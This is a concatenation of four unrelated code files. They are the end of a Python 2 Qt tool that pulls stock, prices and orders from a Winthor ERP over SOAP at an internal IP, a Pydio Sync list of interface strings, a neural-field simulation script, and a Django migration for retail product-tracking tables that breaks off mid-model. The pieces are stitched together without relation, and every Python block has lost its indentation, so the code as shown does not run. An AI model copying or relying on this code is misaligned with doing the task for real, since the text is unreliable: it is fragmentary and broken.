order['integration'] = 'Pedido rejeitado: ' + '. '.join([result['observacao_pc']] + [i['observacao_pc'] for i in result_items])
elif result['importado'] == 1:
order['integration'] = 'Pedido Criado'
sorted_orders = [
[i.get('integration') or '', i['increment_id'], i['created_at'], i['status'], i['billing_name'], i['customer_taxvat'], i['total_item_count'], i['base_grand_total'], i['postcode'].replace('-', ''), i.get('CODCLI'), i.get('CODENDENTCLI'), i.get('NUMPED')]
for i in sorted(orders.values(), key=lambda x: x['created_at'])
]
self.updateProgress.emit(50, json.dumps(sorted_orders))
except Exception as e:
print str(e)
traceback.print_exc()
def toggle(self):
self.isRunning = not self.isRunning
def reset(self):
self.isRunning = True
self.iteration = 0
def finish(self):
self.terminate()
class Winthor():
def getQuantities(self):
r = requests.post(
'http://192.168.24.13/PCSIS2699.EXE/soap/PC_Estoque',
data='''
<x:Envelope xmlns:x="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn3="urn:uPCEstoqueIntf-PC_Estoque">
<x:Header/>
<x:Body>
<urn3:Pesquisar>
<urn3:Codigo_Filial>1</urn3:Codigo_Filial>
</urn3:Pesquisar>
</x:Body>
</x:Envelope>''',
headers={'Content-Type': 'text/xml; charset=utf-8'})
root = ET.fromstring(r.text.encode('utf-8'))
return [dict([(child.tag, child.text) for child in i]) for i in root[0][0][1]]
def getProducts(self):
r = requests.post(
'http://192.168.24.13/PCSIS2699.EXE/soap/PC_Estoque',
data='''
<x:Envelope xmlns:x="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn3="urn:uPCProdutoIntf-PC_Produto">
<x:Header/>
<x:Body>
<urn3:Pesquisar>
<urn3:Somente_Produtos_Ativos>S</urn3:Somente_Produtos_Ativos>
</urn3:Pesquisar>
</x:Body>
</x:Envelope>''',
headers={'Content-Type': 'text/xml; charset=utf-8'})
root = ET.fromstring(r.text.encode('utf-8'))
return [dict([(child.tag, child.text) for child in i]) for i in root[0][0][1]]
def getPrices(self):
r = requests.post(
'http://192.168.24.13/PCSIS2699.EXE/soap/PC_Preco',
data='''
<x:Envelope xmlns:x="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn3="urn:uPCPrecoIntf-PC_Preco">
<x:Header/>
<x:Body>
<urn3:Pesquisar>
</urn3:Pesquisar>
</x:Body>
</x:Envelope>
''',
headers={'Content-Type': 'text/xml; charset=utf-8'})
root = ET.fromstring(r.text.encode('utf-8'))
return [dict([(child.tag, child.text) for child in i]) for i in root[0][0][1]]
def getOrder(self, incrementId):
r = requests.post(
'http://192.168.24.13/PCSIS2699.EXE/soap/PC_Pedido',
data='''
<x:Envelope xmlns:x="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn12="urn:uPCPedidoIntf-PC_Pedido">
<x:Header/>
<x:Body>
<urn12:PesquisarSituacaoPedido>
<urn12:Numero_Pedido_Ecommerce>%s</urn12:Numero_Pedido_Ecommerce>
</urn12:PesquisarSituacaoPedido>
</x:Body>
</x:Envelope>
''' % incrementId,
headers={'Content-Type': 'text/xml; charset=utf-8'})
root = ET.fromstring(r.text.encode('utf-8'))
return [dict([(child.tag, child.text) for child in i]) for i in root[0][0][1]]
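# A self-contained sketch (with a made-up XML payload, not a real Winthor response)
# of how the list-of-dicts conversion above works: every element under
# root[0][0][1] becomes one dict mapping child tag names to their text.
def _demo_soap_rows_to_dicts():
    xml = (
        '<Envelope><Body><Response><Result>ok</Result><Rows>'
        '<Row><codigo_produto>1</codigo_produto><preco_venda>9.90</preco_venda></Row>'
        '<Row><codigo_produto>2</codigo_produto><preco_venda>5.00</preco_venda></Row>'
        '</Rows></Response></Body></Envelope>'
    )
    root = ET.fromstring(xml)
    rows = [dict([(child.tag, child.text) for child in i]) for i in root[0][0][1]]
    assert rows == [
        {'codigo_produto': '1', 'preco_venda': '9.90'},
        {'codigo_produto': '2', 'preco_venda': '5.00'},
    ]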
class ErrorMessage(QtGui.QWidget):
def __init__(self):
QtGui.QWidget.__init__(self)
QtGui.QMessageBox.critical(self,
"Erro!",
"Utilize a rotina a partir do menu.")
self.close()
# Expected call: routine.exe USER DB_PASS DB_ALIAS DB_USER ROUTINE_NUMBER
def main(args):
app = QtGui.QApplication([])
if len(args) != 6:
print('Erro! Número de parâmetros diferente do esperado.')
print('Esperado: 6. Encontrado: %s' % len(args))
ErrorMessage()
return
args = args[1:]
ex = Routine9813(*args)
sys.exit(app.exec_())
if __name__ == '__main__':
main(sys.argv)
|
def _(a_string): return a_string
var_1=_('How can I find my server URL?')
var_2=_('The server URL is the address that you can see in your browser when accessing Pydio via the web.')
var_3=_('It starts with http or https depending on your server configuration.')
var_4=_('If you are logged in Pydio and you see the last part of the URL starting with "ws-", remove this part and only keep the beginning (see image below).')
var_5=_('Got it!')
var_6=_('Connecting ...')
var_7=_('Configure Connection')
var_8=_('Error while trying to connect to %1 :')
var_9=_('%1')
var_10=_('Connect to the server with the same URL as the one you would use to access through a web browser, e.g. http://mydomain.com/pydio')
var_11=_('Required')
var_12=_('Required')
var_13=_('Required')
var_14=_('Tips')
var_15=_('where can I find the server URL?')
var_16=_('Connect')
var_17=_('Trust SSL certificate')
var_18=_('1/3 Select a workspace')
var_19=_('Welcome %1!')
var_20=_('You are connecting to %1')
var_21=_('change')
var_22=_('change')
var_23=_('Remote workspace')
var_24=_('This workspace is read only!')
var_25=_('Synchronise only a subfolder of this workspace')
var_26=_('loading')
var_27=_('Whole workspace')
var_28=_('loading')
var_29=_('Workspace')
var_30=_('Folder')
var_31=_('Change')
var_32=_('Next')
var_33=_('Advanced Parameters')
var_34=_('Save changes')
var_35=_('2/3 Select a destination')
var_36=_('By default a local folder will be created on your computer')
var_37=_('Change')
var_38=_('3/3 Optional Parameters')
var_39=_('Server')
var_40=_('Workspace')
var_41=_('Folder')
var_42=_('Whole workspace')
var_43=_('change')
var_44=_('Local folder')
var_45=_('change')
var_46=_('Name this synchro')
var_47=_('Advanced Parameters')
var_48=_('Previous')
var_49=_('Next')
var_50=_('Previous')
var_51=_('Next')
var_52=_('SYNC NAME')
var_53=_('DATA SIZE')
var_54=_('ESTIMATED TIME')
var_55=_('Ready for ignition!')
var_56=_('Are you ready to launch the synchronization?')
var_57=_('Your data will be in orbit in no time!')
var_58=_('FIRE THE ROCKET!')
var_59=_('change parameters')
var_60=_('Synchronization running...')
var_61=_('Liftoff! First sync can take some time...')
var_62=_('CREATE NEW SYNCHRO')
var_63=_('DONE')
var_64=_('Sync Direction')
var_65=_('Modifications are sent to the server but the client does not download anything.')
var_66=_('Modifications from both sides (local/remote) are automatically reflected on the other side.')
var_67=_('Modifications from the server are downloaded but nothing is sent to the server.')
var_68=_('Upload Only')
var_69=_('computer to server')
var_70=_('Bi-directional')
var_71=_('default when possible')
var_72=_('Download Only')
var_73=_('server to computer')
var_74=_('Sync Frequency')
var_75=_('By default, the application will synchronize automatically')
var_76=_('Automatically')
var_77=_('Manually')
var_78=_('Given Time')
var_79=_('Run the sync every day at')
var_80=_('Conflicts')
var_81=_('When files were modified on both the server and your computer at the same time, a conflict is detected.')
var_82=_('Automatic')
var_83=_('Solve conflicts manually')
var_84=_('With the default keep-both behavior, conflicting files will be copied to your local sync. Which version is to be kept?')
var_85=_('Keep both')
var_86=_('Prefer local')
var_87=_('Prefer remote')
var_88=_('Connection settings')
var_89=_('Increase the timeout in case of slow responsive server')
var_90=_('Timeout in seconds')
var_91=_('You can increase or reduce the number of concurrent connections. More means a faster sync but requires a server with more resources. (Default: 4)')
var_92=_('Concurrent connections')
var_93=_('Include/Exclude from Sync')
var_94=_('Synchronise: use a list of files or patterns to include in the sync')
var_95=_('Do not synchronise, list of files or patterns to exclude from sync')
var_96=_('SYNC %1 parameters')
var_97=_('Server')
var_98=_('Workspace')
var_99=_('Folder')
var_100=_('Resync task')
var_101=_('This operation will make sure that your server and local folder are correctly synchronized. Beware, this can take a while, and may be resource intensive.')
var_102=_('Cancel')
var_103=_('Proceed')
var_104=_('Trigger a full re-indexation')
var_105=_('Label')
var_106=_('Server Connection')
var_107=_('Login')
var_108=_('Password')
var_109=_('Local Folder')
var_110=_('Choose')
var_111=_('Remote workspace')
var_112=_('Workspace')
var_113=_('Folder')
var_114=_('Change')
var_115=_('This workspace is read only!')
var_116=_('Synchronise only a subfolder of this workspace')
var_117=_('Whole workspace')
var_118=_('[loading...]')
var_119=_('Advanced parameters')
var_120=_('Delete Sync')
var_121=_('Save Parameters')
var_122=_('Help us! ')
var_123=_('Give us your feedback to improve PydioSync.')
var_124=_('Please wait...')
var_125=_('PydioSync Feedback Form')
var_126=_('You have the power to help us improve PydioSync by submitting anonymously this simple form.')
var_127=_('Include the number of synced files;')
var_128=_('Include the last sequence number;')
var_129=_('Include server info;')
var_130=_('Include errors;')
var_131=_('Include the number of errors;')
var_132=_('Comments (Appreciated)')
var_133=_('About')
var_134=_('General configurations page')
var_135=_('Update settings')
var_136=_('Enable / Disable update here.')
var_137=_('Set the update check frequency (1 means the update check runs only once a day; the default value 0 means it checks for updates each time the agent establishes a new connection with the UI) ')
var_138=_('Update check frequency in days')
var_139=_('Date on which last update check happened')
var_140=_('Last update check was on: ')
var_141=_('Proxy settings')
var_142=_('Enable / Disable Proxy.')
var_143=_('If you want the network connections to pass through proxy, fill the parameters below.')
var_144=_('Log settings')
var_145=_('You can change the name of log file here.')
var_146=_('File Name')
var_147=_('Limit the number of log files to be stored locally.')
var_148=_('Number of log files')
var_149=_('Set restrictions on log file size here.')
var_150=_('Enhance the log details as you need them.')
var_151=_('Info')
var_152=_('Debug')
var_153=_('Warning')
var_154=_('Other settings')
var_155=_('Max wait time for local db access')
var_156=_('If you encounter a database locked error, try increasing this value')
var_157=_('Timeout in seconds')
var_158=_('Set Language')
var_159=_('Language ')
var_160=_('Update Settings')
var_161=_('Oops, cannot contact the agent! Make sure it is running correctly; the process will try to reconnect in 20s')
var_162=_('Select a workspace')
var_163=_('Full path to the local folder')
var_164=_('Are you sure you want to delete this synchro? No data will be deleted')
var_165=_('computing...')
var_166=_('Status')
var_167=_('syncing')
var_168=_('Size')
var_169=_('Estimated time')
var_170=_('Status')
var_171=_('syncing')
var_172=_('Status')
var_173=_('syncing')
var_174=_('Last sync')
var_175=_('ERROR')
var_176=_('Status')
var_177=_('idle')
var_178=_('[DISABLED]')
var_179=_('Conflicts')
var_180=_('Solve Conflict')
var_181=_('Solved')
var_182=_('Last files synced')
var_183=_('Open File')
var_184=_('Transfers in progress')
var_185=_('An element named %1 was modified on both the server and on your local computer. Select how you want to solve this conflicting case:')
var_186=_('Apply to all conflicts')
var_187=_('Mine')
var_188=_('Both Versions')
var_189=_('Theirs')
var_190=_('Create a new synchronization')
var_191=_('Create a new synchronization')
var_192=_('Share %1 via Pydio')
var_193=_('Share %1 via Pydio')
var_194=_('Description')
var_195=_('Path')
var_196=_('Share item')
var_197=_('by creating a public link that can easily be sent to your contacts.')
var_198=_('You can customize the link parameters using the forms below.')
var_199=_('Secure Link Access')
var_200=_('Optional Password')
var_201=_('Password')
var_202=_('Expires After')
var_203=_('Days')
var_204=_('Downloads')
var_205=_('Security')
var_206=_('Password')
var_207=_('Expires after')
var_208=_('Days')
var_209=_('Downloads')
var_210=_('Advanced parameters')
var_211=_('Link Handle')
var_212=_('If you want a durable and pretty link (like https://.../my-share-link), you can use this field. Link handle will be generated if left empty.')
var_213=_('Description')
var_214=_('This will be displayed to the shared users.')
var_215=_('Access Rights')
var_216=_('By default, the item will be previewed and downloadable')
var_217=_('Preview')
var_218=_('Download')
var_219=_('Upload')
var_220=_('Generate Link')
var_221=_('Generate Link')
var_222=_('Share %1 via Pydio')
var_223=_('Shared Link')
var_224=_('Shared link to the selected item already exists. Below is the link to the selected item')
var_225=_('New shared link to the selected item has been generated')
var_226=_('Shared Link to the selected item has not been generated')
var_227=_('Copy to Clipboard')
var_228=_('UnShare Link')
var_229=_('Text has been copied to clipboard.')
var_230=_('Successfully unshared.')
var_231=_('Please wait ...')
var_232=_('Welcome to the Pydio Sync')
var_233=_('The easiest way to keep your data in control')
var_234=_('Loading...')
var_235=_('Get Started')
var_236=_('Required')
var_237=_('Proxy settings')
var_238=_('Get Started')
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2010 Nicolas Rougier - INRIA - CORTEX Project
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact: CORTEX Project - INRIA
# INRIA Lorraine,
# Campus Scientifique, BP 239
# 54506 VANDOEUVRE-LES-NANCY CEDEX
# FRANCE
''' Numerical integration of dynamic neural fields.
This script implements the numerical integration of dynamic neural fields [1]_
of the form:
1 ∂U(x,t) ⌠+∞
- ------- = -U(x,t) + ⎮ w(|x-y|).f(U(y,t)).dy + I(x,t) + h
α ∂t ⌡-∞
where U(x,t) is the potential of a neural population at position x and time t
w(d) is a neighborhood function from ℝ⁺ → ℝ
f(u) is the firing rate of a single neuron from ℝ → ℝ
I(x,t) is the input at position x and time t
h is the resting potential
α is the temporal decay of the synapse
:References:
_[1] http://www.scholarpedia.org/article/Neural_fields
'''
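# For reference, the same field equation as in the docstring above, written in
# LaTeX form (no new notation is introduced here):
#   \frac{1}{\alpha}\frac{\partial U(x,t)}{\partial t}
#       = -U(x,t) + \int_{-\infty}^{+\infty} w(|x-y|)\, f(U(y,t))\, dy + I(x,t) + h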
import glumpy
import numpy as np
import scipy.linalg
def fromdistance(fn, shape, center=None, dtype=float):
'''Construct an array by executing a function over a normalized distance.
The resulting array therefore has a value
``fn(sqrt((x-x0)²+(y-y0)²))`` at coordinate ``(x,y)`` where x,y ∈ [-1,+1]²
Parameters
----------
fn : callable
The function is called with one parameter representing the normalized
distance. `fn` must be capable of operating on arrays, and should
return a scalar value.
shape : (N,) tuple of ints
Shape of the output array, which also determines the shape of
the coordinate arrays passed to `fn`.
center : sequence of floats, optional
Normalized coordinates (in [-1,+1] per axis) of the point the distance is
measured from. Defaults to the origin.
dtype : data-type, optional
Data-type of the coordinate arrays passed to `fn`. By default,
`dtype` is float.
'''
def distance(*args):
d = 0
for i in range(len(shape)):
d += (2*args[i]/float(shape[i]-1)-1 -center[i])**2
return np.sqrt(d) #/np.sqrt(len(shape))
if center is None:
center = [0.,]*len(shape)
return fn(np.fromfunction(distance,shape,dtype=dtype))
def convolve1d( Z, K ):
''' Discrete, clamped, linear convolution of two one-dimensional sequences.
:Parameters:
Z : (N,) array_like
First one-dimensional input array (input).
K : (M,) array_like
Second one-dimensional input array (kernel).
:Returns:
out : array
Discrete, clamped, linear convolution of `Z` and `K`.
'''
R = np.convolve(Z, K, 'same')
i0 = 0
if R.shape[0] > Z.shape[0]:
i0 = (R.shape[0]-Z.shape[0])//2 + 1 - Z.shape[0]%2  # integer division (also valid under Python 3)
i1 = i0+ Z.shape[0]
return R[i0:i1]
def convolve2d(Z, K, USV = None):
''' Discrete, clamped convolution of two two-dimensional arrays.
:Parameters:
Z : (N1,N2) array_like
First two-dimensional input array (input)
K : (M1,M2) array_like
Second two-dimensional input array (kernel)
:Returns:
out : ndarray
Discrete, clamped, linear convolution of `Z` and `K`
'''
epsilon = 1e-9
if USV is None:
U,S,V = scipy.linalg.svd(K)
U,S,V = U.astype(K.dtype), S.astype(K.dtype), V.astype(K.dtype)
else:
U,S,V = USV
n = (S > epsilon).sum()
R = np.zeros( Z.shape )
for k in range(n):
Zt = Z.copy() * S[k]
for i in range(Zt.shape[0]):
Zt[i,:] = convolve1d(Zt[i,:], V[k,::-1])
for i in range(Zt.shape[1]):
Zt[:,i] = convolve1d(Zt[:,i], U[::-1,k])
R += Zt
return R
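# Illustrative sketch only (not part of the original script): convolve2d above
# relies on the SVD writing the kernel K as a sum of rank-1, i.e. separable,
# terms, so each significant term can be applied as two 1-D convolutions. The
# factorization can be computed once and reused, which is what the main loop
# below also does with its precomputed USV. The input and kernel here are
# arbitrary examples.
def _demo_separable_convolution():
    test_input = np.random.random((40, 40))                           # arbitrary input field
    kernel = fromdistance(lambda d: np.exp(-(d/0.5)**2/2), (81, 81))  # arbitrary radial kernel
    factorization = scipy.linalg.svd(kernel)                          # factor the kernel once
    return convolve2d(test_input, kernel, factorization)              # reuse the factorization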
if __name__ == '__main__':
# Parameters
n = 40
dt = 0.05
alpha = 12.0
tau = 0.25
h = 0.0
s = (n*n)/(40.*40.)
noise = 0.01
theta = 0
dtheta = 0.025
rho = 0.75
n_stims = 3
u = (dt/tau)/alpha
def f(x):
return np.maximum(x,0)
def g(x, width=0.1):
return np.exp(-(x/width)**2/2)
def w(x):
return 1.0*g(x,0.1)-0.5*g(x,1.0)
def stimulus(shape,center,width):
def g2(x) : return g(x,width)
return fromdistance(g2,shape,center)
# Initialization
I = np.zeros((n,n),dtype=np.float32) # input
Z = np.zeros((n,n), dtype=np.float32) # output
Z_ = np.zeros((n,n), dtype=np.float32) # membrane potential
# Kernel
K = fromdistance(w,(2*n+1,2*n+1))
USV = scipy.linalg.svd(K)
# Output decoding
X,Y = np.mgrid[0:n,0:n]
X = 2*X/float(n-1) - 1
Y = 2*Y/float(n-1) - 1
window = glumpy.Window(2*512, 512)
Ii = glumpy.Image(I, interpolation='bicubic',
cmap=glumpy.colormap.Grey_r, vmin=0.0, vmax=2.5)
Zi = glumpy.Image(Z, interpolation='bicubic',
cmap=glumpy.colormap.Grey_r, vmin=0.0, vmax=0.25)
@window.event
def on_draw():
global Zi, Ii
window.clear()
Ii.blit(0,0,512,512)
Zi.blit(512,0,512,512)
@window.event
def on_key_press(key, modifiers):
global Z
if key == glumpy.key.SPACE:
Z[...] = 0
Z_[...] = 0
@window.event
def on_idle(*args):
global I, Z, Z_, Ii, Zi, dt, n, h, s, tau, alpha, theta, dtheta, rho, u
theta += dtheta
I[...] = np.zeros((n,n))
for j in range(n_stims):
t = theta+ j*2*np.pi/n_stims
x,y = rho*np.cos(t),rho*np.sin(t)
I += 2.5*stimulus((n,n), (x,y), 0.1)
I += (2*np.random.random((n,n))-1)*noise
# Compute field activity
for i in range(1):
L = convolve2d(Z,K,USV)/s
Z_ *= (1-tau)
L += I
L *= u
Z_ += L
#Z_[...] = np.minimum(np.maximum(Z_,0),1)
Z[...] = f(Z_)
Zi.update()
Ii.update()
window.draw()
window.mainloop()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-20 09:04
from __future__ import unicode_literals
import datetime
from django.conf import settings
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='AdProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ad_date', models.CharField(blank=True, default=None, max_length=20, null=True)),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('mfg', models.CharField(blank=True, max_length=30, null=True)),
('desc', models.CharField(blank=True, max_length=200, null=True)),
('vendor_number', models.CharField(blank=True, max_length=30, null=True)),
('order_date', models.CharField(blank=True, max_length=30, null=True)),
('received_dc', models.CharField(blank=True, max_length=30, null=True)),
('received_137', models.CharField(blank=True, max_length=30, null=True)),
('received_buyer', models.CharField(blank=True, max_length=40, null=True)),
('received_other', models.CharField(blank=True, default=None, max_length=50, null=True)),
('photo_dldate', models.CharField(blank=True, max_length=50, null=True)),
('whowhen', models.CharField(blank=True, max_length=100, null=True)),
('studio_out', models.CharField(blank=True, max_length=30, null=True)),
('checked_out', models.CharField(blank=True, max_length=100, null=True)),
('have_image', models.CharField(blank=True, max_length=30, null=True)),
('confirmed_placed', models.CharField(blank=True, default='None', max_length=200, null=True)),
('shooting_instructions', models.CharField(blank=True, default=None, max_length=200, null=True)),
('studio_in', models.CharField(blank=True, max_length=50, null=True)),
('notes', models.CharField(blank=True, max_length=200, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('short_sku', models.CharField(blank=True, max_length=30, null=True)),
('from_file', models.CharField(blank=True, max_length=30, null=True)),
('sku', models.CharField(blank=True, max_length=30, null=True)),
('sku_ns', models.CharField(blank=True, max_length=30, null=True)),
('first', models.CharField(blank=True, max_length=5, null=True)),
('first_date', models.CharField(blank=True, max_length=30, null=True)),
('buyer', models.CharField(blank=True, max_length=50, null=True)),
('merch_to_137', models.CharField(blank=True, max_length=200, null=True)),
('product_class', models.CharField(blank=True, max_length=4, null=True)),
('dc_received_u', models.IntegerField(blank=True, null=True)),
('curr_dc_oh_u', models.IntegerField(blank=True, null=True)),
('dc_curr_oo_u', models.IntegerField(blank=True, null=True)),
('na', models.CharField(blank=True, max_length=5, null=True)),
('size_type', models.CharField(blank=True, max_length=10, null=True)),
('color_desc', models.CharField(blank=True, max_length=200, null=True)),
('version', models.CharField(blank=True, max_length=20, null=True)),
],
),
migrations.CreateModel(
name='Buyers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('buyer', models.CharField(blank=True, max_length=50, null=True)),
('department', models.CharField(blank=True, max_length=3, null=True)),
('product_class', models.CharField(blank=True, max_length=4, null=True, unique=True)),
('description', models.CharField(blank=True, max_length=150, null=True)),
],
),
migrations.CreateModel(
name='CheckProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sku_ns', models.CharField(max_length=30)),
('brand', models.CharField(blank=True, max_length=20, null=True)),
('desc', models.CharField(blank=True, max_length=200, null=True)),
('confirmed_placed', models.CharField(blank=True, default='None', max_length=200, null=True)),
('ad_date', models.CharField(blank=True, max_length=20, null=True)),
('mfg', models.CharField(blank=True, max_length=30, null=True)),
('already_tracked', models.CharField(blank=True, default='None', max_length=300, null=True)),
('na', models.NullBooleanField(default=False)),
],
),
migrations.CreateModel(
name='ColorCode',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=3, unique=True)),
('color', models.CharField(blank=True, max_length=30, null=True)),
],
),
migrations.CreateModel(
name='ColorGrid',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('color', models.CharField(blank=True, max_length=30, null=True)),
('hexcode', models.CharField(max_length=6, unique=True)),
('description', models.CharField(max_length=300, unique=True)),
],
),
migrations.CreateModel(
name='Department',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(choices=[('Admin', 'Admin'), ('Advertising', 'Advertising'), ('Art', 'Art'), ('Layout', 'Layout'), ('Copy', 'Copy'), ('Purchasing', 'Purchasing'), ('IT', 'IT')], max_length=64)),
],
),
migrations.CreateModel(
name='Deployed',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('operator', models.CharField(blank=True, max_length=50, null=True)),
('filenames', django.contrib.postgres.fields.jsonb.JSONField()),
],
),
migrations.CreateModel(
name='FirstReceipt',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('buyer', models.CharField(blank=True, max_length=30, null=True)),
('dc_received_u', models.IntegerField(blank=True, null=True)),
('curr_dc_oh_u', models.IntegerField(blank=True, null=True)),
('dc_curr_oo_u', models.IntegerField(blank=True, null=True)),
('date_received', models.CharField(blank=True, max_length=20, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('short_sku', models.CharField(blank=True, max_length=30, null=True)),
('size_type', models.CharField(blank=True, max_length=10, null=True)),
('item_no', models.CharField(blank=True, max_length=30, null=True)),
('vendor_style', models.CharField(blank=True, max_length=30, null=True)),
('description', models.CharField(blank=True, max_length=200, null=True)),
('color_desc', models.CharField(blank=True, max_length=200, null=True)),
('have_image', models.CharField(blank=True, max_length=30, null=True)),
('ad_date', models.CharField(blank=True, max_length=50, null=True)),
('order_date', models.CharField(blank=True, max_length=50, null=True)),
('received_dc', models.CharField(blank=True, max_length=30, null=True)),
('received_137', models.CharField(blank=True, max_length=30, null=True)),
('from_file', models.CharField(blank=True, max_length=30, null=True)),
('photo_dldate', models.DateField(blank=True, null=True)),
('whowhen', models.CharField(blank=True, max_length=100, null=True)),
('studio_out', models.CharField(blank=True, max_length=50, null=True)),
('checked_out', models.CharField(blank=True, max_length=100, null=True)),
('confirmed_placed', models.CharField(blank=True, default='None', max_length=200, null=True)),
('studio_in', models.CharField(blank=True, max_length=50, null=True)),
('merch_to_137', models.CharField(blank=True, max_length=200, null=True)),
('product_class', models.CharField(blank=True, max_length=4, null=True)),
],
),
migrations.CreateModel(
name='HotItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(max_length=30, unique=True)),
('ad_date', models.CharField(blank=True, default=None, max_length=20, null=True)),
('create_date', models.DateField(default=datetime.date.today)),
('item_name', models.CharField(blank=True, max_length=210, null=True)),
('comments', models.TextField(blank=True, max_length=2000, null=True)),
('reply', models.TextField(blank=True, max_length=2000, null=True)),
('confirmed_placed', models.CharField(blank=True, default=None, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='InventoryProduct',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sku', models.CharField(blank=True, max_length=7, null=True)),
('item_no', models.CharField(blank=True, max_length=30, null=True, unique=True)),
('desc', models.CharField(blank=True, max_length=200, null=True)),
('quantity', models.CharField(max_length=3)),
('source', models.CharField(blank=True, max_length=100, null=True)),
],
),
migrations.CreateModel(
name='LargeWebfiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('long_sku', models.CharField(max_length=30)),
('filename', models.CharField(max_length=50)),
('mod_date', models.CharField(blank=True, max_length=200, null=True)),
('item_ns', models.CharField(max_length=30, null=True)),
('sku', models.CharField(max_length=30, null=True)),
('sku_ns', models.CharField(max_length=30, null=True)),
],
),
migrations.CreateModel(
name='MSWebfiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('long_sku', models.CharField(max_length=30)),
('filename', models.CharField(max_length=50)),
('item_ns', models.CharField(max_length=30, null=True)),
('sku', models.CharField(max_length=30, null=True)),
('sku_ns', models.CharField(max_length=30, null=True)),
],
),
migrations.CreateModel(
name='OneImageFiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='PrintFile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('assoc_sku', models.CharField(max_length=30)),
('filename', models.CharField(blank=True, max_length=500, null=True)),
('path', models.CharField(blank=True, max_length=200, null=True)),
('mod_date', models.CharField(blank=True, max_length=200, null=True)),
],
),
migrations.CreateModel(
name='ProcessedFiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_no', models.CharField(max_length=30)),
('filename', models.CharField(blank=True, max_length=50, null=True)),
('processor', models.CharField(blank=True, max_length=50, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('sku', models.CharField(blank=True, max_length=30, null=True)),
('sku_ns', models.CharField(blank=True, max_length=30, null=True)),
('product_class', models.CharField(blank=True, max_length=10, null=True)),
('upload_date', models.CharField(blank=True, max_length=30, null=True)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ad_date', models.CharField(blank=True, default=None, max_length=20, null=True)),
('item_no', models.CharField(blank=True, max_length=30, null=True, unique=True)),
('mfg', models.CharField(blank=True, max_length=30, null=True)),
('desc', models.CharField(blank=True, max_length=200, null=True)),
('vendor_number', models.CharField(blank=True, max_length=30, null=True)),
('order_date', models.DateField(blank=True, null=True)),
('received_dc', models.DateField(blank=True, null=True)),
('received_137', models.CharField(blank=True, max_length=30, null=True)),
('received_buyer', models.CharField(blank=True, max_length=40, null=True)),
('received_other', models.CharField(blank=True, default=None, max_length=50, null=True)),
('photo_dldate', models.CharField(blank=True, max_length=50, null=True)),
('whowhen', models.CharField(blank=True, max_length=100, null=True)),
('studio_out', models.DateField(blank=True, null=True)),
('checked_out', models.CharField(blank=True, max_length=100, null=True)),
('have_image', models.CharField(blank=True, max_length=30, null=True)),
('confirmed_placed', models.CharField(blank=True, default='None', max_length=200, null=True)),
('shooting_instructions', models.CharField(blank=True, default=None, max_length=200, null=True)),
('studio_in', models.CharField(blank=True, max_length=50, null=True)),
('notes', models.CharField(blank=True, max_length=200, null=True)),
('item_ns', models.CharField(blank=True, max_length=30, null=True)),
('short_sku', models.CharField(blank=True, max_length=30, null=True)),
('from_file', models.CharField(blank=True, max_length=30, null=True)),
('sku', models.CharField(blank=True, max_length=30, null=True)),
('sku_ns', models.CharField(blank=True, max_length=30, null=True)),
('first', models.CharField(blank=True, max_length=5, null=True)),
('first_date', models.CharField(blank=True, max_length=30, null=True)),
('buyer', models.CharField(blank=True, max_length=50, null=True)),
('merch_to_137', models.CharField(blank=True, max_length=200, null=True)),
('dc_received_u', models.IntegerField(blank=True, null=True)),
('curr_dc_oh_u', models.IntegerField(blank=True, null=True)),
('dc_curr_oo_u', models.IntegerField(blank=True, null=True)),
('na', models.CharField(blank=True, max_length=5, null=True)),
('size_type', models.CharField(blank=True, max_length=10, null=True)),
('color_desc', models.CharField(blank=True, max_length=200, null=True)),
